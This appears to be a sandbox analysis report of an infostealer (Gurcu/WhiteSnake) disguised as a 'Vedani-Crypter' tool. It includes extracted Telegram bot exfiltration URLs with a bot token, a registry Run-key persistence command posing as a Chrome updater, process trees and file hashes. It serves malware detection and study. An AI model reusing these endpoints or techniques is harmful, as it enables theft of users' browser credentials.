gurcu | 4918d0136cfa5fd6b2cdca204444d7676d9f86b8fba1491b9e996a06f4192eac

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
01/09/2024, 14:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/Vedani-Crypter.exe
Size

6.2MB
MD5

f982e40c831cac8ad143723b49990772
SHA1

e50f97163936e22cf9012b883f73a0eeaf4d90ad
SHA256

13a169db433164fda1023703b80b6dba5fbd1bb1b2fa37a71a0749024f783c2b
SHA512

6c1de77ae2e5376515ad278abdd2d539e9200b3bf1640174e721fef9a9bb2e8f87766b1d62e54917aaea331b839bcba798ca50ba06fa4f0602f12a75bcd63cc7
SSDEEP

98304:RM3epzb71QGQCPDbZfHayCb7BJ5mjwNwwMeZYobSr+v+Z5OwXbJ:RMsdQmRfaycBIGpEogMwXb

Score

10^/10

gurcu credential_access discovery persistence spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendMessage?chat_id=2024893777

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/getUpdates?offset=-

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take

Signatures

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Vedani-Crypter.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	MkHelper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Update.exe

Executes dropped EXE 3 IoCs

pid	Process
264	VedaniCrypter.exe
5036	MkHelper.exe
1324	Update.exe

Loads dropped DLL 6 IoCs

pid	Process
3128	Vedani-Crypter.exe
3128	Vedani-Crypter.exe
3128	Vedani-Crypter.exe
3128	Vedani-Crypter.exe
5036	MkHelper.exe
1324	Update.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogs\\Update.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
29	raw.githubusercontent.com
21	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
636	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
408	timeout.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1768	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
5036	MkHelper.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe
1324	Update.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	5036	MkHelper.exe
Token: SeDebugPrivilege	636	tasklist.exe
Token: SeDebugPrivilege	1324	Update.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1324	Update.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 3628 wrote to memory of 3128	3628	Vedani-Crypter.exe	85
PID 3628 wrote to memory of 3128	3628	Vedani-Crypter.exe	85
PID 3128 wrote to memory of 264	3128	Vedani-Crypter.exe	88
PID 3128 wrote to memory of 264	3128	Vedani-Crypter.exe	88
PID 3128 wrote to memory of 5036	3128	Vedani-Crypter.exe	91
PID 3128 wrote to memory of 5036	3128	Vedani-Crypter.exe	91
PID 5036 wrote to memory of 2332	5036	MkHelper.exe	95
PID 5036 wrote to memory of 2332	5036	MkHelper.exe	95
PID 2332 wrote to memory of 636	2332	cmd.exe	97
PID 2332 wrote to memory of 636	2332	cmd.exe	97
PID 2332 wrote to memory of 3300	2332	cmd.exe	98
PID 2332 wrote to memory of 3300	2332	cmd.exe	98
PID 2332 wrote to memory of 408	2332	cmd.exe	99
PID 2332 wrote to memory of 408	2332	cmd.exe	99
PID 2332 wrote to memory of 1324	2332	cmd.exe	100
PID 2332 wrote to memory of 1324	2332	cmd.exe	100
PID 1324 wrote to memory of 1652	1324	Update.exe	104
PID 1324 wrote to memory of 1652	1324	Update.exe	104
PID 1652 wrote to memory of 1768	1652	cmd.exe	106
PID 1652 wrote to memory of 1768	1652	cmd.exe	106

C:\Users\Admin\AppData\Local\Temp\Vedani-Crypter-Lifetime-Activated-vedani-crypter\Vedani-Crypter\Vedani-Crypter.exe
"C:\Users\Admin\AppData\Local\Temp\Vedani-Crypter-Lifetime-Activated-vedani-crypter\Vedani-Crypter\Vedani-Crypter.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3628
- C:\Users\Admin\AppData\Local\Temp\Vedani-Crypter-Lifetime-Activated-vedani-crypter\Vedani-Crypter\Vedani-Crypter.exe
  "C:\Users\Admin\AppData\Local\Temp\Vedani-Crypter-Lifetime-Activated-vedani-crypter\Vedani-Crypter\Vedani-Crypter.exe"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3128
- - C:\Users\Admin\AppData\Roaming\vedani\VedaniCrypter.exe
    "C:\Users\Admin\AppData\Roaming\vedani\VedaniCrypter.exe"
    3⤵
    - Executes dropped EXE
    PID:264
- - C:\Users\Admin\AppData\Roaming\registerCash\MkHelper.exe
    "C:\Users\Admin\AppData\Roaming\registerCash\MkHelper.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5036
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpAA2A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpAA2A.tmp.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2332
    - - C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 5036"
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:636
    - - C:\Windows\system32\find.exe
        
        find ":"
        5⤵
        
        PID:3300
    - - C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:408
    - - C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogs\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogs\Update.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1324
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogs\Update.exe /f
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1652
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogs\Update.exe /f
        7⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Filesize
1.7MB

MD5
65ccd6ecb99899083d43f7c24eb8f869

SHA1
27037a9470cc5ed177c0b6688495f3a51996a023

SHA256
aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

SHA512
533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36282\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36282\_bz2.pyd

Filesize
81KB

MD5
bbe89cf70b64f38c67b7bf23c0ea8a48

SHA1
44577016e9c7b463a79b966b67c3ecc868957470

SHA256
775fbc6e9a4c7e9710205157350f3d6141b5a9e8f44cb07b3eac38f2789c8723

SHA512
3ee72ba60541116bbca1a62db64074276d40ad8ed7d0ca199a9c51d65c3f0762a8ef6d0e1e9ebf04bf4efe1347f120e4bc3d502dd288339b4df646a59aad0ec1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36282\_lzma.pyd

Filesize
153KB

MD5
0a94c9f3d7728cf96326db3ab3646d40

SHA1
8081df1dca4a8520604e134672c4be79eb202d14

SHA256
0a70e8546fa6038029f2a3764e721ceebea415818e5f0df6b90d6a40788c3b31

SHA512
6f047f3bdaead121018623f52a35f7e8b38c58d3a9cb672e8056a5274d02395188975de08cabae948e2cc2c1ca01c74ca7bc1b82e2c23d652e952f3745491087

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36282\base_library.zip

Filesize
812KB

MD5
fbd6be906ac7cd45f1d98f5cb05f8275

SHA1
5d563877a549f493da805b4d049641604a6a0408

SHA256
ae35709e6b8538827e3999e61a0345680c5167962296ac7bef62d6b813227fb0

SHA512
1547b02875f3e547c4f5e15c964719c93d7088c7f4fd044f6561bebd29658a54ef044211f9d5cfb4570ca49ed0f17b08011d27fe85914e8c3ea12024c8071e8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36282\python310.dll

Filesize
4.3MB

MD5
deaf0c0cc3369363b800d2e8e756a402

SHA1
3085778735dd8badad4e39df688139f4eed5f954

SHA256
156cf2b64dd0f4d9bdb346b654a11300d6e9e15a65ef69089923dafc1c71e33d

SHA512
5cac1d92af7ee18425b5ee8e7cd4e941a9ddffb4bc1c12bb8aeabeed09acec1ff0309abc41a2e0c8db101fee40724f8bfb27a78898128f8746c8fe01c1631989

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAA2A.tmp.bat

Filesize
278B

MD5
cb6e1c1ee278ebb9869a02f24abbf2a1

SHA1
71cca36cb35e8af73348825506e4e01384f279c6

SHA256
95aa8860f35c604ad7ea4bb05525d9420444a463512b8b4be36e4dbc8a457f7a

SHA512
939e3b1709708d41dc63cec3f1b99cc5e5b5be99e5f874889d8ff60fbda5f50d368e23a9c1d3500d0468389064ea8167884ed27e60eb92622b396032c21e59a0

Download Submit
C:\Users\Admin\AppData\Roaming\registerCash\MkHelper.exe

Filesize
5.6MB

MD5
612173309c257f2385cdc05c2f8f4ecc

SHA1
e27c24d9a54df063a2cc22e687c9e5f08e0181cb

SHA256
c9a0aea64ee81d3914980c968f2da7e45b17d008e81576b25fbc3c8415d1d899

SHA512
79dad7c537b6573da25627c9379a562db337040c1f845e7cdb5cebe27c232f27476e2ab356353c571b617723aac61c869ebc1758615b32cad87fbfac1deb9d8b

Download Submit
C:\Users\Admin\AppData\Roaming\vedani\VedaniCrypter.exe

Filesize
5.2MB

MD5
e7b448f71bfabbcf84fc5f7c8cc219a6

SHA1
fe5f861a03207da4fe6b4093bbdc5588e6a0fe07

SHA256
522497cf6abdb91e9d64e0bc2f0ddedab87f74eefccb43a9fe222cf4bba570f0

SHA512
c1a5f8008b5a421db803447d7b443c99bf081920347be1fa417279b3c1857362e262d32bab1b893684daa0cbb8a26735090d28efb188f81351889b7f56a48b06

Download Submit
C:\Users\Admin\AppData\Roaming\vedani\XanderUI.dll

Filesize
185KB

MD5
b7498196f0a200cc729703e6127eb3cb

SHA1
1fb5e3127987b38c1e9309f7a65dd2f45a5f5754

SHA256
cdf2ff8c0970f4144500c81c5678055ded70c05285ba3d3ff04e44fa78d9ce64

SHA512
0922ebc190c7af93655c833b8e3ba3f98d49011dbbc822f633813d2e47db8b7f1a6a22fbfcb08d5fcebc11bd90a9d3392fe1c40af7391048c70d273ef17a86f1

Download Submit
memory/264-71-0x00007FFCA30E0000-0x00007FFCA3BA1000-memory.dmp

Filesize
10.8MB

Download
memory/264-34-0x000001B408920000-0x000001B408E62000-memory.dmp

Filesize
5.3MB

Download
memory/264-33-0x00007FFCA30E3000-0x00007FFCA30E5000-memory.dmp

Filesize
8KB

Download
memory/264-70-0x00007FFCA30E3000-0x00007FFCA30E5000-memory.dmp

Filesize
8KB

Download
memory/264-35-0x00007FFCA30E0000-0x00007FFCA3BA1000-memory.dmp

Filesize
10.8MB

Download
memory/264-60-0x000001B4234E0000-0x000001B423514000-memory.dmp

Filesize
208KB

Download
memory/1324-72-0x00000206B0670000-0x00000206B067A000-memory.dmp

Filesize
40KB

Download
memory/1324-73-0x00000206C9A20000-0x00000206C9A8A000-memory.dmp

Filesize
424KB

Download
memory/1324-75-0x00000206C9C90000-0x00000206C9D42000-memory.dmp

Filesize
712KB

Download
memory/1324-76-0x00000206C9D90000-0x00000206C9DE0000-memory.dmp

Filesize
320KB

Download
memory/1324-77-0x00000206C9DE0000-0x00000206C9E02000-memory.dmp

Filesize
136KB

Download
memory/1324-79-0x00000206C9E50000-0x00000206C9E8A000-memory.dmp

Filesize
232KB

Download
memory/1324-80-0x00000206B0640000-0x00000206B0666000-memory.dmp

Filesize
152KB

Download
memory/1324-98-0x00000206C9E10000-0x00000206C9E22000-memory.dmp

Filesize
72KB

Download
memory/5036-58-0x000001F950A80000-0x000001F950A9E000-memory.dmp

Filesize
120KB

Download
memory/5036-57-0x000001F96AB60000-0x000001F96ABD6000-memory.dmp

Filesize
472KB

Download
memory/5036-52-0x000001F9500A0000-0x000001F950642000-memory.dmp

Filesize
5.6MB

Download